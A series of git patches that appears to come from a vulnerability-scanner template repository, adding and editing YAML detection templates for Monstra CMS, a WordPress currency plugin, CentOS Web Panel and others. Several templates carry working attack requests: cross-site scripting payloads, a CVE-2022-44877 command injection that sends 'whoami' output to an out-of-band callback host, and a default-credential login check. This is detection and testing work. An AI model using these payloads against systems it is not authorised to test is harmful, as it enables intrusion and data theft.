<44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 9 Jan 2023 11:33:27 +0530 Subject: [PATCH 0798/1133] Create CVE-2018-11227.yaml --- cves/2018/CVE-2018-11227.yaml | 44 +++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 cves/2018/CVE-2018-11227.yaml diff --git a/cves/2018/CVE-2018-11227.yaml b/cves/2018/CVE-2018-11227.yaml new file mode 100644 index 0000000000..c10d8ffbfb --- /dev/null +++ b/cves/2018/CVE-2018-11227.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-11227 + +info: + name: Monstra CMS V3.0.4 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Monstra CMS 3.0.4 and earlier has XSS via index.php. + reference: + - https://github.com/monstra-cms/monstra/issues/438 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 + classification: + cve-id: CVE-2018-11227 + metadata: + verified: true + tags: cve,cve2018,xss,mostra,mostracms,cms + +requests: + - raw: + - | + POST /admin/index.php?id=pages HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "><svg/onload=alert(document.domain)>" + - "Monstra" + condition: and + case-insensitive: true + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 38ea7f5ddfe8bf5e079721172775aea34e1c9130 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 9 Jan 2023 07:33:22 +0000 Subject: [PATCH 0799/1133] Auto Generated New Template Addition List [Mon Jan 9 07:33:22 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4975ca9232..127732fb1e 100644 --- a/.new-additions +++ b/.new-additions @@ -2,4 +2,5 @@ exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposures/mobiproxy-dashboard.yaml misconfiguration/installer/impresspages-installer.yaml +misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml From 56e83449a77db73614ec440576e4ccf958de5a20 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 9 Jan 2023 14:22:31 +0530 Subject: [PATCH 0801/1133] updated for case sensitive matcher --- miscellaneous/dir-listing.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/miscellaneous/dir-listing.yaml b/miscellaneous/dir-listing.yaml index d48b40bc94..7b132a91d4 100644 --- a/miscellaneous/dir-listing.yaml +++ b/miscellaneous/dir-listing.yaml @@ -2,7 +2,7 @@ id: dir-listing info: name: Directory listing enabled - author: _harleo,pentest_swissky + author: _harleo,pentest_swissky,hczdmr severity: info reference: - https://portswigger.net/kb/issues/00600100_directory-listing @@ -22,6 +22,7 @@ requests: - "[To Parent Directory]" - "Directory: /" condition: or + case-insensitive: true - type: regex part: body From 1605f6827073d327ee870a531e0d9366e9e4d6e5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 9 Jan 2023 16:29:31 +0530 Subject: [PATCH 0802/1133] update matcher --- exposures/configs/zend-config-file.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/exposures/configs/zend-config-file.yaml b/exposures/configs/zend-config-file.yaml index 1f60324cbf..a1040bfa06 100644 --- a/exposures/configs/zend-config-file.yaml +++ b/exposures/configs/zend-config-file.yaml @@ -2,7 +2,7 @@ id: zend-config-file info: name: Zend Configuration File - author: pdteam,geeknik + author: pdteam,geeknik,Akokonunes severity: high tags: config,exposure,zend,php @@ -26,10 +26,10 @@ requests: stop-at-first-match: true matchers-condition: and matchers: - - type: word - words: - - "resources.db.params.password" - - "resources.db.params.username" + - type: regex + regex: + - "db.*(.password).*=" + - "db.*(.username).*=" condition: and - type: word From f4283a0e180a8fb38c47c7c17109a75be254389c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 9 Jan 2023 18:15:28 +0530 Subject: [PATCH 0804/1133] PMM Installation Wizard --- misconfiguration/installer/pmm-installer.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 misconfiguration/installer/pmm-installer.yaml diff --git a/misconfiguration/installer/pmm-installer.yaml b/misconfiguration/installer/pmm-installer.yaml new file mode 100644 index 0000000000..cf159a7187 --- /dev/null +++ b/misconfiguration/installer/pmm-installer.yaml @@ -0,0 +1,30 @@ +id: pmm-installer + +info: + name: PMM Installation Wizard + author: pussycat0x + severity: high + metadata: + verified: true + shodan-query: http.title:"PMM Installation Wizard" + tags: misconfig,exposure,install,pmm + +requests: + - method: GET + path: + - "{{BaseURL}}/password-page/ovf/account-credentials-ovf" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "PMM Installation Wizard" + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From 42fdc97581b6a434f7efe8244626e9430192d308 Mon Sep 17 00:00:00 2001 From: lu4nx <lx@shellcodes.org> Date: Mon, 9 Jan 2023 20:54:39 +0800 Subject: [PATCH 0805/1133] Update fingerprint of openEuler --- technologies/fingerprinthub-web-fingerprints.yaml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index c0c0749efa..8be593e73e 100755 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -12873,6 +12873,15 @@ requests: words: - welcome to nginx on ubuntu! + - type: word + name: openeuler + condition: and + words: + # for Apache: <title>Test Page for the Apache HTTP Server on openEuler Linux + # for Nginx: Test Page for the Nginx HTTP Server on openEuler + - Test Page for + - HTTP Server on openEuler + - type: word name: ucap-search- words: From 6e68c7ae2c3cf4760f1214ad3d2fa96839e521ef Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Mon, 9 Jan 2023 15:02:10 +0000 Subject: [PATCH 0806/1133] Update empire-C2.yaml Fix yaml synthax --- default-logins/empire-C2.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/default-logins/empire-C2.yaml b/default-logins/empire-C2.yaml index a57ddf4ec1..6c4282aa7b 100644 --- a/default-logins/empire-C2.yaml +++ b/default-logins/empire-C2.yaml @@ -9,7 +9,6 @@ info: - https://github.com/BC-SECURITY/Empire - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server tags: default-login,empire - requests: - raw: - | @@ -18,14 +17,12 @@ requests: Content-Type: application/json {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - empireadmin pass: - password123 - matchers-condition: and matchers: - type: word From 46f65a2c160984a766235d4ffef735a733855898 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Mon, 9 Jan 2023 15:08:48 +0000 Subject: [PATCH 0807/1133] Update empire-C2.yaml Yammmmmmmmmmmmmmmmmmmmmmml synthax --- default-logins/empire-C2.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/default-logins/empire-C2.yaml b/default-logins/empire-C2.yaml index 6c4282aa7b..815e2b7725 100644 --- a/default-logins/empire-C2.yaml +++ b/default-logins/empire-C2.yaml @@ -9,20 +9,23 @@ info: - https://github.com/BC-SECURITY/Empire - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server tags: default-login,empire + requests: - raw: - | POST /api/admin/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - empireadmin pass: - password123 + matchers-condition: and matchers: - type: word From 509b5605eb0b075b3058ac778e7d359e1bba63bc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 9 Jan 2023 21:07:07 +0530 Subject: [PATCH 0808/1133] fix-formatting & matcher --- .../empirec2-default-login.yaml} | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) rename default-logins/{empire-C2.yaml => empire/empirec2-default-login.yaml} (76%) diff --git a/default-logins/empire-C2.yaml b/default-logins/empire/empirec2-default-login.yaml similarity index 76% rename from default-logins/empire-C2.yaml rename to default-logins/empire/empirec2-default-login.yaml index 815e2b7725..3d7dfcf100 100644 --- a/default-logins/empire-C2.yaml +++ b/default-logins/empire/empirec2-default-login.yaml @@ -1,10 +1,9 @@ -id: empireC2-default-login-api +id: empirec2-default-login info: - name: Empire-C2 Default Login Api + name: Empire-C2 Default Login author: clem9669 severity: high - description: Kanboard default login was discovered. reference: - https://github.com/BC-SECURITY/Empire - https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server @@ -29,10 +28,14 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - - 'token' - condition: and - case-insensitive: true + - '"token":"' + + - type: word + part: header + words: + - 'application/json' - type: status status: From c36aa24a1f8c910e94b00bca1fff12edba0e1f73 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 9 Jan 2023 21:08:53 +0530 Subject: [PATCH 0809/1133] Update CVE-2022-44877.yaml --- cves/2022/CVE-2022-44877.yaml | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-44877.yaml b/cves/2022/CVE-2022-44877.yaml index 5c34d8e7b2..cfecb2492c 100644 --- a/cves/2022/CVE-2022-44877.yaml +++ b/cves/2022/CVE-2022-44877.yaml @@ -7,20 +7,21 @@ info: description: | RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 + - https://twitter.com/_0xf4n9x_/status/1612068225046675457 - https://github.com/numanturle/CVE-2022-44877 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 classification: cve-id: CVE-2022-44877 metadata: + verified: true shodan-query: http.title:"Login | Control WebPanel" - tags: cve,cve2022,centos,firewall,rce + tags: cve,cve2022,centos,rce requests: - raw: - | - POST /login/index.php?login=$(wget${IFS}http://{{interactsh-url}}) HTTP/1.1 + POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1 Host: {{Hostname}} - X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded username=root&password=toor&commit=Login @@ -30,8 +31,20 @@ requests: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - "dns" + + - type: word + part: body + words: + - "Login Redirect." - type: status status: - 302 + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' From 27cee92894b159921301d801e2ed12ce38c7ae17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 01:42:39 +0000 Subject: [PATCH 0810/1133] Auto Generated New Template Addition List [Tue Jan 10 01:42:39 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 127732fb1e..d0f344edf1 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-44877.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml exposures/mobiproxy-dashboard.yaml From 4f6654b1a6b5ab8c72375f702659c54b47fc88a0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 02:01:48 +0000 Subject: [PATCH 0811/1133] Auto Generated CVE annotations [Tue Jan 10 02:01:48 UTC 2023] :robot: --- cves/2022/CVE-2022-44877.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-44877.yaml b/cves/2022/CVE-2022-44877.yaml index cfecb2492c..b921cd36e6 100644 --- a/cves/2022/CVE-2022-44877.yaml +++ b/cves/2022/CVE-2022-44877.yaml @@ -10,11 +10,12 @@ info: - https://twitter.com/_0xf4n9x_/status/1612068225046675457 - https://github.com/numanturle/CVE-2022-44877 - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 + - https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386 classification: cve-id: CVE-2022-44877 metadata: - verified: true shodan-query: http.title:"Login | Control WebPanel" + verified: "true" tags: cve,cve2022,centos,rce requests: From 76adf6a5311eec9a462da1b4d4c5c8b0d6240575 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 04:01:54 +0000 Subject: [PATCH 0812/1133] Auto WordPress Plugins Update [Tue Jan 10 04:01:54 UTC 2023] :robot: --- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/megamenu.txt | 2 +- helpers/wordpress/plugins/polylang.txt | 2 +- helpers/wordpress/plugins/pretty-link.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 4764627f92..e06d07afe1 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.9.2 \ No newline at end of file +3.10.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index de4914e939..385495e93e 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -14.9.0 \ No newline at end of file +14.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/megamenu.txt b/helpers/wordpress/plugins/megamenu.txt index f398a20612..06a445799f 100644 --- a/helpers/wordpress/plugins/megamenu.txt +++ b/helpers/wordpress/plugins/megamenu.txt @@ -1 +1 @@ -3.0 \ No newline at end of file +3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/polylang.txt b/helpers/wordpress/plugins/polylang.txt index f30101c080..712bd5a680 100644 --- a/helpers/wordpress/plugins/polylang.txt +++ b/helpers/wordpress/plugins/polylang.txt @@ -1 +1 @@ -3.3 \ No newline at end of file +3.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt index 132d9f7707..712bd5a680 100644 --- a/helpers/wordpress/plugins/pretty-link.txt +++ b/helpers/wordpress/plugins/pretty-link.txt @@ -1 +1 @@ -3.2.8 \ No newline at end of file +3.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 1f47cd8969..ff59c07b83 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.12 \ No newline at end of file +13.2.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 689f7fbd33..ae6e65bd96 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.5.2 \ No newline at end of file +4.5.3 \ No newline at end of file From dcbee3570e69a9f5b4e953841f3630973b626f4b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 04:07:11 +0000 Subject: [PATCH 0813/1133] Auto WordPress Plugins Update [Tue Jan 10 04:07:11 UTC 2023] :robot: --- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/megamenu.txt | 2 +- helpers/wordpress/plugins/polylang.txt | 2 +- helpers/wordpress/plugins/pretty-link.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 4764627f92..e06d07afe1 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.9.2 \ No newline at end of file +3.10.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index de4914e939..385495e93e 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -14.9.0 \ No newline at end of file +14.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/megamenu.txt b/helpers/wordpress/plugins/megamenu.txt index f398a20612..06a445799f 100644 --- a/helpers/wordpress/plugins/megamenu.txt +++ b/helpers/wordpress/plugins/megamenu.txt @@ -1 +1 @@ -3.0 \ No newline at end of file +3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/polylang.txt b/helpers/wordpress/plugins/polylang.txt index f30101c080..712bd5a680 100644 --- a/helpers/wordpress/plugins/polylang.txt +++ b/helpers/wordpress/plugins/polylang.txt @@ -1 +1 @@ -3.3 \ No newline at end of file +3.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt index 132d9f7707..712bd5a680 100644 --- a/helpers/wordpress/plugins/pretty-link.txt +++ b/helpers/wordpress/plugins/pretty-link.txt @@ -1 +1 @@ -3.2.8 \ No newline at end of file +3.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 1f47cd8969..ff59c07b83 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.12 \ No newline at end of file +13.2.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 689f7fbd33..ae6e65bd96 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.5.2 \ No newline at end of file +4.5.3 \ No newline at end of file From cf1faf43c41718c451ab5d381d658a5215419add Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 11:19:47 +0530 Subject: [PATCH 0814/1133] Create CVE-2020-23697.yaml --- cves/2020/CVE-2020-23697.yaml | 62 +++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 cves/2020/CVE-2020-23697.yaml diff --git a/cves/2020/CVE-2020-23697.yaml b/cves/2020/CVE-2020-23697.yaml new file mode 100644 index 0000000000..36c701cac4 --- /dev/null +++ b/cves/2020/CVE-2020-23697.yaml @@ -0,0 +1,62 @@ +id: CVE-2020-23697 + +info: + name: Monstra CMS V3.0.4 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php. + reference: + - https://github.com/monstra-cms/monstra/issues/463 + - https://nvd.nist.gov/vuln/detail/CVE-2020-23697 + classification: + cve-id: CVE-2020-23697 + metadata: + verified: true + tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated + +variables: + string: "{{to_lower('{{randstr}}')}}" + +requests: + - raw: + - | + POST /admin/index.php?id=dashboard HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login={{username}}&password={{password}}&login_submit=Log+In + + - | + GET /admin/index.php?id=pages&action=add_page HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + POST /admin/index.php?id=pages&action=add_page HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15 + + - | + GET /{{string}} HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(all_headers_4, "text/html")' + - 'status_code_4 == 200' + - 'contains(body_4, ">") && contains(body_4, "Monstra")' + condition: and + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'id="csrf" name="csrf" value="(.*)">' + internal: true From c4ae211807d2b94e81fb09377ae5d96c91e6da3d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 10 Jan 2023 12:00:24 +0530 Subject: [PATCH 0815/1133] Create CVE-2022-0234.yaml --- cves/2022/CVE-2022-0234.yaml | 50 ++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2022/CVE-2022-0234.yaml diff --git a/cves/2022/CVE-2022-0234.yaml b/cves/2022/CVE-2022-0234.yaml new file mode 100644 index 0000000000..0a4a98644a --- /dev/null +++ b/cves/2022/CVE-2022-0234.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-0234 + +info: + name: WOOCS < 1.3.7.5 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: | + The plugin does not sanitise and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0234 + cwe-id: CWE-79 + tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocs,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency= HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '"current_currency":' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 356c01ab4dd884d425547e43422d003ca7c6dc52 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 12:31:41 +0530 Subject: [PATCH 0816/1133] Create monstra-admin-panel.yaml --- exposed-panels/monstra-admin-panel.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/monstra-admin-panel.yaml diff --git a/exposed-panels/monstra-admin-panel.yaml b/exposed-panels/monstra-admin-panel.yaml new file mode 100644 index 0000000000..2f7b4426e0 --- /dev/null +++ b/exposed-panels/monstra-admin-panel.yaml @@ -0,0 +1,27 @@ +id: monstra-admin-panel + +info: + name: Monstra Admin Panel + author: ritikchaddha + severity: info + reference: + - https://github.com/monstra-cms/monstra/ + tags: panel,monstra + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/index.php" + + matchers: + - type: word + part: body + words: + - 'content="Monstra Admin Area' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Version ([0-9.]+)' From c0f5ce77bfb27fabbb72744e19373990496b778f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 12:38:23 +0530 Subject: [PATCH 0817/1133] Create monstracms-detect.yaml --- .../monstracms/monstracms-detect.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 exposed-panels/monstracms/monstracms-detect.yaml diff --git a/exposed-panels/monstracms/monstracms-detect.yaml b/exposed-panels/monstracms/monstracms-detect.yaml new file mode 100644 index 0000000000..36e43568da --- /dev/null +++ b/exposed-panels/monstracms/monstracms-detect.yaml @@ -0,0 +1,37 @@ +id: monstracms-detect + +info: + name: MonstraCMS Detection + author: ritikchaddha + severity: info + reference: + - https://github.com/monstra-cms/monstra/ + metadata: + verified: true + shodan-query: http.favicon.hash:419828698 + tags: panel,monstra,monstracms + +requests: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'content="Powered by Monstra' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'content="Powered by Monstra ([0-9.]+)' From 0d596ce1d97a9fd4ff447450a35b5f0a2efcad15 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 12:40:27 +0530 Subject: [PATCH 0818/1133] Update monstra-admin-panel.yaml --- exposed-panels/monstra-admin-panel.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/exposed-panels/monstra-admin-panel.yaml b/exposed-panels/monstra-admin-panel.yaml index 2f7b4426e0..2e5fe05440 100644 --- a/exposed-panels/monstra-admin-panel.yaml +++ b/exposed-panels/monstra-admin-panel.yaml @@ -6,6 +6,9 @@ info: severity: info reference: - https://github.com/monstra-cms/monstra/ + metadata: + verified: true + shodan-query: http.favicon.hash:419828698 tags: panel,monstra requests: @@ -13,12 +16,17 @@ requests: path: - "{{BaseURL}}/admin/index.php" + matchers-condition: and matchers: - type: word part: body words: - 'content="Monstra Admin Area' + - type: status + status: + - 200 + extractors: - type: regex part: body From ae41dcaffd1c6d5a793202b8183c3382ef6911dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 10 Jan 2023 09:39:05 +0000 Subject: [PATCH 0819/1133] Auto Generated New Template Addition List [Tue Jan 10 09:39:05 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d0f344edf1..4e50a4ab44 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ cves/2022/CVE-2022-44877.yaml exposed-panels/episerver-panel.yaml exposed-panels/freepbx-administration-panel.yaml +exposed-panels/monstra-admin-panel.yaml exposures/mobiproxy-dashboard.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml From 4dcbcaf3918bc9701c1a29a11730ed750dc1f109 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 10 Jan 2023 15:10:39 +0530 Subject: [PATCH 0820/1133] Update and rename exposed-panels/monstracms/monstracms-detect.yaml to technologies/monstracms-detect.yaml --- .../monstracms => technologies}/monstracms-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {exposed-panels/monstracms => technologies}/monstracms-detect.yaml (95%) diff --git a/exposed-panels/monstracms/monstracms-detect.yaml b/technologies/monstracms-detect.yaml similarity index 95% rename from exposed-panels/monstracms/monstracms-detect.yaml rename to technologies/monstracms-detect.yaml index 36e43568da..2536978755 100644 --- a/exposed-panels/monstracms/monstracms-detect.yaml +++ b/technologies/monstracms-detect.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:419828698 - tags: panel,monstra,monstracms + tags: tech,monstra,monstracms requests: - method: GET From a2906747abd28afc3f535275f6d0556f20d0fcbf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 15:11:01 +0530 Subject: [PATCH 0821/1133] remove extra header --- cves/2018/CVE-2018-11473.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2018/CVE-2018-11473.yaml b/cves/2018/CVE-2018-11473.yaml index aa117dc491..1223a5b5d7 100644 --- a/cves/2018/CVE-2018-11473.yaml +++ b/cves/2018/CVE-2018-11473.yaml @@ -24,7 +24,6 @@ requests: - | POST /users/registration HTTP/1.1 Host: {{Hostname}} - Origin: http://192.168.1.17 Content-Type: application/x-www-form-urlencoded csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register From f2ef7872c03a0fc0be3b3b71612e3609e8da5e28 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 15:12:05 +0530 Subject: [PATCH 0822/1133] added metadata --- cves/2018/CVE-2018-11473.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-11473.yaml b/cves/2018/CVE-2018-11473.yaml index 1223a5b5d7..438ae683ad 100644 --- a/cves/2018/CVE-2018-11473.yaml +++ b/cves/2018/CVE-2018-11473.yaml @@ -13,6 +13,7 @@ info: cve-id: CVE-2018-11473 metadata: verified: true + shodan-query: http.favicon.hash:419828698 tags: cve,cve2018,xss,mostra,mostracms,cms requests: From c2fca08026261aecc5022590ff3b6315c73ea6ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 10 Jan 2023 15:12:55 +0530 Subject: [PATCH 0823/1133] added metadata --- cves/2018/CVE-2018-11227.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-11227.yaml 